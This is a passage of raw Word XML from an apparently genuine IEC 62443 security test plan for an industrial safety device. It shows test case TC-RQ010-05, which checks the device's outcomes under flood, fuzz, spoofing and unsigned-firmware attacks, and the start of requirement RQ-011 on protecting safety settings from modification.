            <w:r w:rsidRPr="00873FC0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>All foreseeable classes (aggregate outcome check)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="15"/>
            <w:r w:rsidRPr="003F2591">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="15"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w14:paraId="721C9C3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7C779C8" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A97F19B" w14:textId="6492969C" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00873FC0"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SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="2F4763F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A14903" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7AD4EE" w14:textId="532FDD73" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00C46B3C" w:rsidP="00C46B3C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1953"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C46B3C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For every attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00C46B3C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the RQ-010-owned flood (TC-RQ010-02) and fuzz (TC-RQ010-03), plus the cross-referenced connecting-device spoofing (TC-RQ001-02) and unsigned-firmware install (TC-RQ005-03)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00C46B3C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> positively verify the EHSR outcome: no attempt produces an uncommanded/unsafe output; the device continues safely or enters the defined safe state. Surface the one class (firmware) that escapes the fail-safe design.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00FD6890" w14:paraId="58F21AC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60D2A25E" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3DF5E7" w14:textId="77777777" w:rsidR="006915B3" w:rsidRDefault="006915B3"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915B3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Wire safe outputs to PLC inputs for independent readback. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49734957" w14:textId="77777777" w:rsidR="006915B3" w:rsidRDefault="006915B3"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915B3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. For each attack case (owned + cross-referenced), sample output state + qualifier. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BABCD5D" w14:textId="760F711D" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="006915B3"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915B3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Classify each outcome as {safe-continue, safe-passivate, hazardous}. 4. Consolidate into an outcome matrix; flag any hazardous result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="663EDCD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F98A99" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3246EEAB" w14:textId="5817C563" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="000234F7"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0234F7">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PASS (RQ-010 met for that class) iff every outcome is safe-continue or safe-passivate. FAIL iff any yields uncommanded/unsafe actuation. Expected: flood/fuzz/spoofing classes PASS (black channel + CR 3.6); the firmware-install class (TC-RQ005-03) is the documented exception that can lead to hazard (G-3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14AB8305" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRPr="00AF57B2" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CE18E8" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">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AE2023" w14:paraId="2F301E9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9E37B4" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCBA970" w14:textId="77777777" w:rsidR="00AE2023"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AE2023" w14:paraId="481457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2EFE1" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45898732" w14:textId="2DC68D7C" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00095EF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95EF6">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="5FBBA40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F74E290" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5224902B" w14:textId="3E843812" w:rsidR="00AE2023" w:rsidRPr="00912C40" w:rsidRDefault="00912C40" w:rsidP="00BE3CFC">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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912C40">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; safe DO → PLC DI readback; laptop mirror; Pi as attack source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="68892C0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8F80CC" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684CE20E" w14:textId="09D1B789" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="000F4BA2" w:rsidP="000F4BA2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2617"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F4BA2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PLC watch-table/logging; Wireshark; consolidated results spreadsheet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="0F00A86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16A9C19" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F35495" w14:textId="5474BBD6" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="007478C9"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478C9">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Run RQ-010-owned cases; import outcome records from TC-RQ001-02 and TC-RQ005-03; for each, record {DO state, qualifier, device state, outcome-class}; compile the aggregate hazard matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="557A5B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485952" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D976E97" w14:textId="4C3658EA" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00B85DD0"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85DD0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Flood (TC-RQ010-02) → safe-passivate; malformed (TC-RQ010-03) → safe-reject/passivate; rogue-frame (TC-RQ001-02) → safe; unsigned firmware (TC-RQ005-03) → HAZARDOUS (residual, G-3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="3EF5D5B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214B2EF" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F216392" w14:textId="0B441957" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="002568EC"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All comms-class safe/ Firmware-class hazardous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="4328A7C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813D8AA" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C6BEB25" w14:textId="16C32147" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00235995"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235995">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC1005_outcome_matrix.xlsx, per-case DO/qualifier traces (incl. imported TC-RQ001-02/TC-RQ005-03), consolidated verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D18BF30" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AF00DD" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B433B31" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633B8151" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DEBB28" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A329656" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D853CEA" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC00BF9" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F815296" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEC0A67" w14:textId="77777777" w:rsidR="003C1BAD" w:rsidRDefault="003C1BAD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A326C46" w14:textId="77777777" w:rsidR="00A97116" w:rsidRDefault="00A97116" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B02BDC" w14:textId="19E78447" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F6ED1"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5B4AA0EF" w14:textId="0F7AFCE2" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CD514" w14:textId="4205C033" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4139">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall prevent modifications to safety-relevant settings or rules, including those generated during a learning phase, where such modifications could lead to a hazardous situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C573B74" w14:textId="7B183512" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 1.1, CR 1.2, CR 2.1 (2), CR 3.4</w:t>
      </w:r>
      <w:r w:rsidR="00946C02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, EDR </w:t>
      </w:r>
      <w:r w:rsidR="0005457F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990AD28" w14:textId="4FDF0A57" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B (Safety Config), G (Operating Mode)</w:t>
      </w:r>
      <w:r w:rsidR="0005457F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain Separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F8D1A" w14:textId="571F214D" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00451280">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Spoofing, Elevation of Privilege</w:t>
      </w:r>
      <w:r w:rsidR="00451280">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188B4DE" w14:textId="77777777" w:rsidR="0019326C" w:rsidRPr="00AD4AB2" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BDFEA3" w14:textId="34B722B5" w:rsidR="00AD4AB2" w:rsidRPr="00AD4AB2" w:rsidRDefault="00AD4AB2" w:rsidP="00AD4AB2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IoT-Core read-only, incoming-only</w:t>
      </w:r>
      <w:r w:rsidR="00855543">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> No parameter writes over IoT (SRIO-7908, SRIO-8299).</w:t>
      </w:r>
    </w:p>
